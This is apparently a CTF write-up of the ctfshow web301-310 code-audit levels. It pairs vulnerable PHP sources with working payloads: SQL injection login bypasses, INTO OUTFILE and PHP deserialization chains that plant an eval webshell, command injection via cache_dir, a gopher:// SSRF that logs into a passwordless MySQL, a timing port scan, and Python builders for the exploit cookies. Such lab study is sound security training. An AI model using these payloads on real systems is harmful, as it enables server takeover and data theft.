
WEB Basics: Code Audit (ctfshow web301 to web310)

web301

checklogin.php builds a SQL statement from unfiltered input:

<?php
error_reporting(0);
session_start();
require 'conn.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
// $username is concatenated straight into the query: no escaping, no prepared statement
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
    $_SESSION['error']="1";
    header("location:login.php");
    return;
}
// login succeeds when the submitted password equals the stored value, compared case-insensitively
if(!strcasecmp($userpwd,$row['sds_password'])){
    $_SESSION['login']=1;
    $result->free();
    $mysqli->close();
    header("location:index.php");
    return;
}
$_SESSION['error']="1";
header("location:login.php");
?>

Injection point:

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";

Approach 1: UNION injection

Username: -1' union select 1#
Password: 1

The quote closes the string literal and # comments out the rest, so the statement that actually runs is select sds_password from sds_user where sds_username='-1' union select 1. The first SELECT matches nothing, the UNION contributes one row whose sds_password is 1, and strcasecmp("1", "1") returns 0, so the check passes.

Approach 2: write a webshell through the injection, then run commands to read the flag

Username: -1' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php"#
Password: 1

This only works when the MySQL account holds the FILE privilege, secure_file_priv is unset, and /var/www/html is writable by the mysqld user; the file is written regardless of what the login check does afterwards.

Then visit 1.php and send PHP code in POST parameter 1.
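To see the UNION bypass and its fix side by side, here is an added example (my code, not from the original page or the ctfshow challenge) that rebuilds the checklogin.php lookup in Python against an in-memory SQLite table. SQLite has no # comment, so the payload ends with "-- " instead; the table layout and seed row are constructed here, with the admin hash ta
ken from the sds_user.sql dump quoted under web303.

```python
import sqlite3

# Constructed stand-in for the sds_user table; the real one lives in MySQL on the target.
SEED_ROWS = [(1, "admin", "27151b7b1ad51a38ea66b1529cde5ee4")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table sds_user(id integer primary key, sds_username text, sds_password text)"
    )
    conn.executemany("insert into sds_user values (?, ?, ?)", SEED_ROWS)
    return conn


def lookup_password_vulnerable(conn, username):
    """checklogin.php as written: the username is spliced into the SQL text."""
    sql = ("select sds_password from sds_user where sds_username='" + username
           + "' order by id limit 1")
    row = conn.execute(sql).fetchone()
    return None if row is None else str(row[0])


def lookup_password_safe(conn, username):
    """The fix: a bound parameter, so the quote and UNION in the payload are plain data."""
    sql = "select sds_password from sds_user where sds_username=? order by id limit 1"
    row = conn.execute(sql, (username,)).fetchone()
    return None if row is None else str(row[0])


def login(conn, lookup, username, password):
    """Mirror of the PHP flow: no row -> fail; strcasecmp(password, stored) == 0 -> success.
    In web301 the stored value is compared directly, so knowing the hash is enough to log in."""
    stored = lookup(conn, username)
    return stored is not None and stored.lower() == password.lower()


# The payload from the page, with SQLite's "-- " comment in place of MySQL's "#".
UNION_PAYLOAD = "-1' union select '1'-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login(db, lookup_password_vulnerable, UNION_PAYLOAD, "1"))
    print("parameterized:", login(db, lookup_password_safe, UNION_PAYLOAD, "1"))
```

With the vulnerable builder the injected row logs us in with password 1; with the bound parameter the same string is looked up as a literal username, finds no row, and the login fails.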

web302

The changed line:

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

Now the check passes whenever sds_decode($userpwd) equals $row['sds_password']. Searching the code finds the function:

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
?>

Approach 1: UNION injection with a generated hash. The injected row has to contain sds_decode of the password we will submit, so compute it first:

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode("1");
?>

Output:

d9c77c4e454869d5d8da3b4be79694d3
Username: -1' union select 'd9c77c4e454869d5d8da3b4be79694d3'#
Password: 1

Approach 2: write a webshell through the injection, exactly as in web301

Username: -1' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php"#
Password: 1

Then visit 1.php.

web303

<?php
error_reporting(0);
session_start();
require 'conn.php';
require 'fun.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
// new in this level: usernames longer than 6 characters are rejected outright
if(strlen($username)>6){
    die();
}
$userpwd=$_POST['userpwd'];
// the username is still concatenated unescaped
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
    $_SESSION['error']="1";
    header("location:login.php");
    return;
}
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
    $_SESSION['login']=1;
    $result->free();
    $mysqli->close();
    header("location:index.php");
    return;
}
$_SESSION['error']="1";
header("location:login.php");
?>

This time checklogin.php adds a restriction: the username may not exceed 6 characters, so the previous UNION payloads no longer fit.
sds_user.sql contains the user record:

INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');

Feeding admin to fun.php's sds_decode reproduces that hash, so the password is admin:

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode("admin");
?>

[screenshot omitted]
Looking further, dpt.php and dptadd.php are both marked as injection points.

dpt.php

<?php
// injection point (as marked in the source): id is taken from the query string unfiltered
$_GET['id']=!empty($_GET['id'])?$_GET['id']:NULL;
$page=$_GET['id'];
$sql="select * from sds_dpt order by id;";
$result=$mysqli->query($sql);
?>

dptadd.php

<?php
session_start();
require 'conn.php';
if(!isset($_SESSION['login'])){
    header("location:login.php");
    return;
}else{
    // injection point: every field below is concatenated into the INSERT unescaped
    $_POST['dpt_name']=!empty($_POST['dpt_name'])?$_POST['dpt_name']:NULL;
    $_POST['dpt_address']=!empty($_POST['dpt_address'])?$_POST['dpt_address']:NULL;
    $_POST['dpt_build_year']=!empty($_POST['dpt_build_year'])?$_POST['dpt_build_year']:NULL;
    $_POST['dpt_has_cert']=!empty($_POST['dpt_has_cert'])?$_POST['dpt_has_cert']:NULL;
    $_POST['dpt_cert_number']=!empty($_POST['dpt_cert_number'])?$_POST['dpt_cert_number']:NULL;
    $_POST['dpt_telephone_number']=!empty($_POST['dpt_telephone_number'])?$_POST['dpt_telephone_number']:NULL;
    $dpt_name=$_POST['dpt_name'];
    $dpt_address=$_POST['dpt_address'];
    $dpt_build_year=$_POST['dpt_build_year'];
    $dpt_has_cert=$_POST['dpt_has_cert']=="on"?"1":"0";
    $dpt_cert_number=$_POST['dpt_cert_number'];
    $dpt_telephone_number=$_POST['dpt_telephone_number'];
    $mysqli->query("set names utf-8");
    $sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
    $result=$mysqli->query($sql);
    echo $sql;   // the executed statement is echoed back to the client
    if($result===true){
        $mysqli->close();
        header("location:dpt.php");
    }else{
        die(mysqli_error($mysqli));   // and so is any MySQL error message
    }
}
?>

Start from dptadd.php. It requires $_SESSION['login'], so log in as admin first. Every field goes into an INSERT ... SET statement unescaped, and the echo $sql and die(mysqli_error()) lines additionally expose the query and any MySQL error. Because the script redirects to dpt.php, which lists the table, a subquery placed in sds_address shows up in the address column of the new row.

/dptadd.php

POST:

dpt_name=1',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

Result (the address column of the new row on dpt.php):

sds_dpt,sds_fl9g,sds_user

POST:

dpt_name=1',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#

Result:

flag

POST:

dpt_name=1',sds_address=(select group_concat(flag) from sds_fl9g)#

Result:

ctfshow{88032351-c084-4403-9921-218c6c28811f}

web304

A global WAF was added; the pattern matches any digit, letter or hyphen:

function sds_waf($str){
    return preg_match('/[0-9]|[a-z]|-/i', $str);
}

The steps are the same as in the previous level; only the flag table is now sds_flaag instead of sds_fl9g:

dpt_name=1',sds_address=(select flag from sds_flaag)#

web305

fun.php

<?php
function sds_decode($str){
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}
function sds_waf($str){
    // rejects every ASCII punctuation character, including the quote, parentheses and # the earlier injections needed
    if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){
        return false;
    }else{
        return true;
    }
}
?>

The filter is strict and is applied in dptadd.php, so the earlier SQL injection no longer works.
[screenshot omitted]
Compared with web303, this level's checklogin.php also deserializes a cookie:

<?php
error_reporting(0);
session_start();
require 'conn.php';
require 'fun.php';
require 'class.php';
// attacker-controlled cookie goes straight into unserialize(); class.php is loaded, so its classes are available
$user_cookie = $_COOKIE['user'];
if(isset($user_cookie)){
    $user = unserialize($user_cookie);
}
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
if(strlen($username)>6){
    die();
}
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
    $_SESSION['error']="1";
    header("location:login.php");
    return;
}
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
    $_SESSION['login']=1;
    $result->free();
    $mysqli->close();
    header("location:index.php");
    return;
}
$_SESSION['error']="1";
header("location:login.php");
?>

Cookie deserialization:

$user_cookie = $_COOKIE['user'];
if(isset($user_cookie)){$user = unserialize($user_cookie);
}

class.php

<?php
class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __destruct(){
        // runs when the object is freed, i.e. shortly after unserialize() in checklogin.php
        file_put_contents($this->username, $this->password);
    }
}

Build the payload. unserialize() never calls __construct, so only the property values matter; the generator below also fires its own __destruct on exit and writes 1.php into the current directory:

<?php
class user{
    public $username;
    public $password;
    public function __construct(){
        $this->username='1.php';
        $this->password='<?php eval($_POST[1]);?>';
    }
    public function __destruct(){
        file_put_contents($this->username, $this->password);
    }
}
$a = new user();
echo urlencode(serialize($a));

Output, sent as the user cookie to checklogin.php:

O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D

[screenshot omitted]
Viewing the password:
[screenshot omitted]
Connecting to the database:
[screenshot omitted]

web306

class.php has a file-write operation in log::close():

<?php
class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
}
class dpt{
    public $name;
    public $address;
    public $build_year;
    public $have_cert="0";
    public $cert_num;
    public $phone;
    public function __construct($n,$a,$b,$h,$c,$p){
        $this->name=$n;
        $this->address=$a;
        $this->build_year=$b;
        $this->have_cert=$h;
        $this->cert_num=$c;
        $this->phone=$p;
    }
}
class log{
    public $title='log.txt';
    public $info='';
    public function loginfo($info){
        $this->info=$this->info.$info;
    }
    public function close(){
        // arbitrary file write: both the path and the content are public properties
        file_put_contents($this->title, $this->info);
    }
}

index.php deserializes the cookie (base64-decoded first this time):

$user = unserialize(base64_decode($_COOKIE['user']));

dao.php has a class whose destructor calls a method on a property we control:

<?php
require 'config.php';
require 'class.php';
class dao{
    private $config;
    private $conn;
    public function __construct(){
        $this->config=new config();
        $this->init();
    }
    private function init(){
        $this->conn=new mysqli($this->config->get_mysql_host(),$this->config->get_mysql_username(),$this->config->get_mysql_password(),$this->config->get_mysql_db());
    }
    public function __destruct(){
        // $conn is assumed to be a mysqli, but after unserialize() it is whatever the cookie says
        $this->conn->close();
    }
    public function get_user_password_by_username($u){
        $sql="select sds_password from sds_user where sds_username='".$u."' order by id limit 1;";
        $result=$this->conn->query($sql);
        $row=$result->fetch_array(MYSQLI_BOTH);
        if($result->num_rows>0){
            return $row['sds_password'];
        }else{
            return '';
        }
    }
}

So we can build a chain that fires on deserialization:

[index.php] unserialize -> [dao.php] dao::__destruct() -> $this->conn->close() -> [class.php] log::close() -> file_put_contents()

unserialize() never runs dao::__construct(), so init() and the MySQL connection are skipped; $conn is whatever the cookie contains, here a log object whose title is the file name and whose info is the file content. $conn is private, so its serialized name is \0dao\0conn; the base64 layer keeps those NUL bytes intact in the cookie.

<?php
class dao{
    private $conn;
    public function __construct(){
        $this->conn=new log();
    }
}
class log{
    public $title;
    public $info;
    public function __construct(){
        $this->title='1.php';
        $this->info='<?php eval($_POST[1]);?>';
    }
}
$a = new dao();
echo urlencode(base64_encode(serialize($a)));

Send it as the user cookie to:

/index.php

Then use the shell to read:

/flag.php

web307

[screenshot omitted]
The previous level's method no longer works.
dao.php has a method that runs a shell command:

<?php
require 'config/config.php';
require 'class.php';
class dao{
    private $config;
    private $conn;
    public function __construct(){
        $this->config=new config();
        $this->init();
    }
    private function init(){
        $this->conn=new mysqli($this->config->get_mysql_host(),$this->config->get_mysql_username(),$this->config->get_mysql_password(),$this->config->get_mysql_db());
    }
    public function __destruct(){
        $this->conn->close();
    }
    public function get_user_password_by_username($u){
        $sql="select sds_password from sds_user where sds_username='".$u."' order by id limit 1;";
        $result=$this->conn->query($sql);
        $row=$result->fetch_array(MYSQLI_BOTH);
        if($result->num_rows>0){
            return $row['sds_password'];
        }else{
            return '';
        }
    }
    public function get_dpt_all(){
        $sql="select * from sds_dpt;";
        $result=$this->conn->query($sql);
        $dpt_array = array();
        if($result->num_rows>0){
            while($row=$result->fetch_array(MYSQLI_BOTH)){
                array_push($dpt_array, new dpt($row['id'],$row['sds_name'],$row['sds_address'],$row['sds_build_date'],$row['sds_have_safe_card'],$row['sds_safe_card_num'],$row['sds_telephone']));
            }
        }
        return $dpt_array;
    }
    public function insert_dpt($u,$a,$b,$h,$c,$p){
        $sql="insert INTO `sds_dpt` (`sds_name`, `sds_address`, `sds_build_date`, `sds_have_safe_card`, `sds_safe_card_num`, `sds_telephone`) VALUES ('$u', '$a', '$b', '$h', '$c', '$p');";
        $result=$this->conn->query($sql);
        return $result;
    }
    public function clearCache(){
        // cache_dir comes from the config object, which the cookie controls
        shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
    }
}

Command execution:

public function clearCache(){
    shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
}

config.php

<?php
class config{
    private $mysql_username='root';
    private $mysql_password='phpcj';
    private $mysql_db='sds';
    private $mysql_port=3306;
    private $mysql_host='localhost';
    public $cache_dir = 'cache';
    public function get_mysql_username(){return $this->mysql_username;}
    public function get_mysql_password(){return $this->mysql_password;}
    public function get_mysql_port(){return $this->mysql_port;}
    public function get_mysql_db(){return $this->mysql_db;}
    public function get_mysql_host(){return $this->mysql_host;}
}

logout.php deserializes a cookie and calls clearCache() on the result:

<?php
session_start();
error_reporting(0);
require 'service/service.php';
unset($_SESSION['login']);
unset($_SESSION['error']);
setcookie('user','',0,'/');
$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
    $service->clearCache();
}
setcookie('PHPSESSID','',0,'/');
setcookie('service','',0,'/');
header("location:../login.php");
?>

The relevant lines:

$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
    $service->clearCache();
}

POP chain:

[/controller/logout.php] unserialize -> [/controller/service/dao/dao.php] dao::clearCache() -> shell_exec()

cache_dir is a public property of config, so the cookie controls the string spliced into the command. With the value below, shell_exec runs rm -rf ./1; echo "<?php eval($_POST[1]);?>" > 1.php;/* : the rm removes nothing of interest, the echo writes the shell, and the trailing /* is a failing command that does no harm. In the PHP single-quoted string \$ stays a literal backslash-dollar, which the shell's double quotes then turn back into $.

<?php
class config{
    public $cache_dir = '1; echo "<?php eval(\$_POST[1]);?>" > 1.php;';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a = new dao();
echo base64_encode(serialize($a));

Send it as the service cookie to:

/controller/logout.php

[screenshot omitted]

The shell is written relative to logout.php's working directory, so connect with AntSword at:

/controller/1.php

web308

clearCache() in dao.php now filters cache_dir: it must match ^[a-z]+$ (letters only), so the previous command injection fails.

public function clearCache(){
    if(preg_match('/^[a-z]+$/i', $this->config->cache_dir)){
        shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
    }
}

Solution:
index.php also deserializes the service cookie, and calls checkVersion() on the result:

$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
    $lastVersion=$service->checkVersion();
}
?>

dao.php

<?php
require 'config/config.php';
require 'class.php';
class dao{
    private $config;
    private $conn;
    public function __construct(){
        $this->config=new config();
        $this->init();
    }
    private function init(){
        $this->conn=new mysqli($this->config->get_mysql_host(),$this->config->get_mysql_username(),$this->config->get_mysql_password(),$this->config->get_mysql_db());
    }
    public function __destruct(){
        $this->conn->close();
    }
    public function get_user_password_by_username($u){
        $sql="select sds_password from sds_user where sds_username='".$u."' order by id limit 1;";
        $result=$this->conn->query($sql);
        $row=$result->fetch_array(MYSQLI_BOTH);
        if($result->num_rows>0){
            return $row['sds_password'];
        }else{
            return '';
        }
    }
    public function get_dpt_all(){
        $sql="select * from sds_dpt;";
        $result=$this->conn->query($sql);
        $dpt_array = array();
        if($result->num_rows>0){
            while($row=$result->fetch_array(MYSQLI_BOTH)){
                array_push($dpt_array, new dpt($row['id'],$row['sds_name'],$row['sds_address'],$row['sds_build_date'],$row['sds_have_safe_card'],$row['sds_safe_card_num'],$row['sds_telephone']));
            }
        }
        return $dpt_array;
    }
    public function insert_dpt($u,$a,$b,$h,$c,$p){
        $sql="insert INTO `sds_dpt` (`sds_name`, `sds_address`, `sds_build_date`, `sds_have_safe_card`, `sds_safe_card_num`, `sds_telephone`) VALUES ('$u', '$a', '$b', '$h', '$c', '$p');";
        $result=$this->conn->query($sql);
        return $result;
    }
    public function clearCache(){
        if(preg_match('/^[a-z]+$/i', $this->config->cache_dir)){
            shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
        }
    }
    public function checkVersion(){
        return checkUpdate($this->config->update_url);
    }
}

The important method:

public function checkVersion(){
    return checkUpdate($this->config->update_url);
}

config.php

<?php
class config{
    private $mysql_username='root';
    private $mysql_password='';
    private $mysql_db='sds';
    private $mysql_port=3306;
    private $mysql_host='localhost';
    public $cache_dir = 'cache';
    public $update_url = 'https://vip.ctf.show/version.txt';
    public function get_mysql_username(){return $this->mysql_username;}
    public function get_mysql_password(){return $this->mysql_password;}
    public function get_mysql_port(){return $this->mysql_port;}
    public function get_mysql_db(){return $this->mysql_db;}
    public function get_mysql_host(){return $this->mysql_host;}
}

The property it reads:

public $update_url = 'https://vip.ctf.show/version.txt';

config.php also shows that MySQL has no password: mysql_password is the empty string.

fun.php

<?php
function sds_decode($str){
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}
function sds_waf($str){
    if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){
        return false;
    }else{
        return true;
    }
}
function checkUpdate($url){
    // the URL is used as-is: no scheme whitelist, no host check, redirects followed, TLS unverified
    $ch=curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $res = curl_exec($ch);
    curl_close($ch);
    return $res;
}
?>

checkUpdate() hands the URL straight to cURL with no scheme or host check, so a cookie-controlled update_url is an SSRF. libcurl speaks far more than HTTP (gopher://, file://, dict:// and others), which is what lets the following steps talk to services on localhost.

index.php

$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
    $lastVersion=$service->checkVersion();
}

Chain:

[index.php] unserialize -> [/controller/service/dao/dao.php] dao::checkVersion() -> [fun.php] checkUpdate() -> curl_exec()

MySQL on localhost has no password, so a gopher:// URL can replay a complete MySQL login and query through cURL. Gopherus generates the payload:

python2 gopherus.py --exploit mysql

Enter the following.
Database username:

root

Query to execute:

select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php";

[screenshot omitted]

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%3b%01%00%00%00%01
<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}class config{public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%3b%01%00%00%00%01';
}
$a = new dao();
echo base64_encode(serialize($a));
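The interesting part of this step is what Gopherus actually puts on the wire. The added Python example below (my code, not Gopherus's and not from the original page) rebuilds the same payload from the MySQL client/server protocol: a HandshakeResponse41 packet with an empty auth-response, one COM_QUERY and a COM_QUIT, each percent-encoded into a gopher:// URL. The capability flags and connect attributes (client version 5.7.22, pid 27255) are copied from the Gopherus output above so the result is byte-identical; they are otherwise arbitrary and the server does not check them.

```python
import struct
from urllib.parse import unquote_to_bytes

# Constants copied from the Gopherus output on this page so the result is byte-identical;
# the client identity (pid 27255, version 5.7.22) is arbitrary and never verified by the server.
CLIENT_CAPABILITIES = 0x01FFA685          # includes CLIENT_PLUGIN_AUTH and CLIENT_CONNECT_ATTRS
MAX_PACKET_SIZE = 0x01000000
CHARSET_UTF8_GENERAL_CI = 0x21
CONNECT_ATTRS = [
    (b"_os", b"Linux"), (b"_client_name", b"libmysql"), (b"_pid", b"27255"),
    (b"_client_version", b"5.7.22"), (b"_platform", b"x86_64"), (b"program_name", b"mysql"),
]
COM_QUIT, COM_QUERY = 0x01, 0x03


def lenenc_str(data):
    """Length-encoded string; only the one-byte length form (< 251) is needed here."""
    if len(data) >= 251:
        raise ValueError("multi-byte length-encoded integers not implemented")
    return bytes([len(data)]) + data


def mysql_packet(seq, payload):
    """MySQL wire packet: 3-byte little-endian payload length, 1-byte sequence id, payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq]) + payload


def handshake_response(user, plugin=b"mysql_native_password"):
    """HandshakeResponse41 with an EMPTY auth-response. A real client hashes the password
    with the random challenge from the server greeting; curl never reads that greeting, so
    this only authenticates when the account has no password at all (config.php in web308)."""
    body = struct.pack("<II", CLIENT_CAPABILITIES, MAX_PACKET_SIZE)
    body += bytes([CHARSET_UTF8_GENERAL_CI]) + b"\x00" * 23      # reserved filler
    body += user + b"\x00"
    body += b"\x00"                                              # auth-response length 0
    body += plugin + b"\x00"
    body += lenenc_str(b"".join(lenenc_str(k) + lenenc_str(v) for k, v in CONNECT_ATTRS))
    return body


def build_mysql_gopher(host, port, user, query):
    """gopher:// URL replaying a whole session: login (sequence id 1, because the unread
    server greeting was packet 0), one COM_QUERY, then COM_QUIT."""
    raw = (mysql_packet(1, handshake_response(user.encode()))
           + mysql_packet(0, bytes([COM_QUERY]) + query.encode())
           + mysql_packet(0, bytes([COM_QUIT])))
    # Gopherus percent-encodes every byte with lowercase hex. The "_" after the slash is the
    # gopher item-type selector, which curl strips before writing the rest to the socket.
    return f"gopher://{host}:{port}/_" + "".join(f"%{b:02x}" for b in raw)


def split_packets(gopher_url):
    """Inverse for inspection: (sequence id, payload) for each packet in the URL."""
    raw = unquote_to_bytes(gopher_url.split("/_", 1)[1])
    packets, pos = [], 0
    while pos + 4 <= len(raw):
        length = int.from_bytes(raw[pos:pos + 3], "little")
        packets.append((raw[pos + 3], raw[pos + 4:pos + 4 + length]))
        pos += 4 + length
    return packets


if __name__ == "__main__":
    url = build_mysql_gopher("127.0.0.1", 3306, "root",
                             'select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php";')
    print(url)
    for seq, payload in split_packets(url):
        print(seq, len(payload), payload[:24])
```

The same construction explains why the trick dies in web309: with a password set, the server rejects the empty auth-response, and since curl cannot read the challenge it could not compute a valid one even if the password were known.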


Send it as the service cookie to:

/index.php

[screenshot omitted]
Connect with AntSword at:

/1.php

web309

The hint says MySQL now has a password, so replaying a passwordless login through gopher no longer works.

The same SSRF can port-scan with gopher (replace PORT with the port to test):

<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
class config{
    public $update_url = 'gopher://127.0.0.1:PORT';
}
$a = new dao();
echo base64_encode(serialize($a));

Common ports worth checking:

21 FTP
22 SSH
80 HTTP
443 HTTPS
3389 RDP
1433 MS-SQL Server
3306 MySQL
6379 Redis
9000 PHP-FPM / FastCGI

When a gopher:// request reaches a port with a listening service, the service accepts the connection and waits for input, so cURL, and with it our page request, stalls for a while; when nothing listens, the connection is refused at once and the page returns immediately. Whether the request stalls therefore tells us whether the port is open. A firewall that silently drops packets would also stall, so treat a stall as a lead to confirm rather than proof.
[screenshot omitted]
The procedure is the same as before: put the generated value in the service cookie and request /index.php. The request for port 9000 did not return, so port 9000 is open:

TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyMzoiZ29waGVyOi8vMTI3LjAuMC4xOjkwMDAiO319
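The cookies for web305, web306 and this port scan all come from PHP's serialize(). The added Python example below (my code, not from the original page) reproduces that format, including the NUL-byte name mangling of private properties that forces the base64 or urlencode wrapping, and uses it for the timing-based scan just described. Class and property names are those of the page's class.php, dao.php and config.php; the scan function assumes a target URL is passed in and needs network access, so only the cookie builders run offline.

```python
import base64
import time
import urllib.request
from urllib.parse import quote_plus


class PhpObject:
    """A PHP object to serialize: class name plus ordered (name, visibility, value) triples."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def _mangle(cls, name, visibility):
    # PHP serializes private properties as "\0Class\0name" and protected ones as "\0*\0name".
    # Those NUL bytes are why the page wraps serialize() in base64_encode() and/or urlencode().
    if visibility == "private":
        return f"\x00{cls}\x00{name}"
    if visibility == "protected":
        return f"\x00*\x00{name}"
    return name


def php_serialize(value):
    """None/bool/int/str/PhpObject in the format produced by PHP's serialize()."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # must precede the int check: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'   # PHP string lengths are byte counts
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(_mangle(value.cls, name, vis)) + php_serialize(val)
            for name, vis, val in value.props
        )
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def build_user_cookie(filename, content):
    """web305 'user' cookie: public username/password, written out by user::__destruct().
    Same encoding as PHP's urlencode(serialize($a)) (PHP would additionally encode '~')."""
    user = PhpObject("user", [("username", "public", filename), ("password", "public", content)])
    return quote_plus(php_serialize(user), safe="")


def build_log_write_cookie(filename, content):
    """web306 'user' cookie: dao with a PRIVATE $conn holding a log object, so that
    dao::__destruct() -> $this->conn->close() -> log::close() -> file_put_contents().
    Same encoding as urlencode(base64_encode(serialize($a)))."""
    log = PhpObject("log", [("title", "public", filename), ("info", "public", content)])
    dao = PhpObject("dao", [("conn", "private", log)])
    return quote_plus(base64.b64encode(php_serialize(dao).encode()).decode(), safe="")


def build_service_cookie(update_url):
    """web308-310 'service' cookie: dao -> private config -> public update_url, which
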